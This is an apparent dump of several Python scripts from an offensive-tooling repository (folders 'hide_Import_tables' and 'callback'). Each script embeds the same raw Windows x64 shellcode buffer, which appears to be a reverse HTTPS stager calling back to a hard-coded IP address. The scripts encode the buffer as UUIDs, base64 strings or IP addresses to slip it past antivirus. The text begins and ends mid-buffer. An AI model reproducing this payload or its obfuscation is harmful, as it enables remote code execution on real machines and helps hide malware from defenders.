x2f\x4c\x79\x32\x66\x00\x16\x18\x19\x7f\xcf\x26\x02\x0c\xf1\x94\x1a\x0a\x74\xb2\xe1\x19\xfd\xfd\x5f\xed\xe6\x21\xde\xcd\xe3\x2c\x0e\xc7\x64\xb2\x38\xb4\x66\x03\xbb\xe5\x74\x99\xa5\x4b\x97\xa9\x63\x91\x01\x65\x05\x7c\x94\xa1\xe9\x26\x87\x59\x70\xda\x68\xe2\x5f\xf8\x23\xde\x25\x99\xf9\x62\xef\x5f\x61\xf1\x32\xfd\xab\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x71\x64\x65\x73\x6b\x20\x32\x2e\x34\x2e\x31\x32\x36\x33\x2e\x32\x30\x33\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x7d\x0a\x12\x0c\x48\xa8\x65\xa9\x66\xba\xca\x2f\x81\xdb\xc5\x30\xdb\x66\x81\xe7\xfb\x7c\x18\x4e\x81\xba\x3d\xd0\x33\x80\x49\xdf\x04\xdb\x34\xb2\x32\xc6\xa2\x0d\x41\xd7\x93\xcd\x7d\x9d\xd9\x43\x86\x5c\x72\x66\x16\xe8\x44\x95\x9f\x83\x63\xce\x2f\xd1\xb1\x99\xe6\xce\xc9\xd6\xa7\x6c\x6d\x40\x22\x5c\x38\xc6\x4f\xde\x3a\x83\x84\x72\xf9\x1a\x95\x3b\x53\x53\xc8\x71\xea\x07\xba\x9e\x98\xa6\x6d\x37\xd5\xfa\x3b\xb6\x25\x5f\x48\x3b\x68\x52\x1e\xab\x44\xcb\x33\x3d\xa1\x44\x8f\x58\x48\xf0\x54\xd9\xa5\x5a\x1d\x04\xa5\x28\x9b\xe5\xc3\x7a\x36\x13\x1c\x11\xcb\x55\xf9\xbd\x7a\xec\xce\x6c\x87\xe5\x94\x09\x44\xf4\x6f\x06\xb9\x0f\xdf\xbf\xcc\x28\x7b\x10\x1d\x86\x4a\xd6\xa7\xf2\xec\x21\xd7\xfa\x1c\x00\x54\x6a\x3b\xc8\x62\xc5\xa1\xde\x80\x1c\xd3\x44\xb3\x88\xf8\xa9\xbd\xf8\xab\xba\x8b\x42\x84\x9e\xa2\x71\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 17 | u = convertToUUID(buf) 18 | print(str(u).replace("'","\"")) -------------------------------------------------------------------------------- /hide_Import_tables/v0.1/trans.py: -------------------------------------------------------------------------------- 1 | import uuid 2 | 3 | def convertToUUID(shellcode): 4 | if len(shellcode)%16 !=0: 5 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 6 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 7 | shellcode += addNullbyte 8 | 9 | uuids = [] 10 | for i in range(0,len(shellcode),16): 11 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 12 | uuids.append(uuidString.replace("'","\"")) 13 | return uuids 14 | 15 | if __name__ == '__main__': 16 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 17 | u = convertToUUID(buf) 18 | print(str(u).replace("'","\"")) -------------------------------------------------------------------------------- /callback/v0.2/trans.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import uuid 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 5 | 6 | def convertToUUIDToBase64(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | uuids = [] 13 | for i in range(0,len(shellcode),16): 14 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 15 | uuids.append(base64.b64encode(uuidString.replace("'","\"").encode('utf-8'))) 16 | return uuids 17 | 18 | 19 | u = convertToUUIDToBase64(buf) 20 | print([str(i, 'utf-8') for i in u]) -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/trans.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import uuid 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 5 | 6 | def convertToUUIDToBase64(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | uuids = [] 13 | for i in range(0,len(shellcode),16): 14 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 15 | uuids.append(base64.b64encode(uuidString.replace("'","\"").encode('utf-8'))) 16 | return uuids 17 | 18 | 19 | u = convertToUUIDToBase64(buf) 20 | print(str([str(i, 'utf-8') for i in u]).replace("'",'"')) -------------------------------------------------------------------------------- /hide_Import_tables/v0.3/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\x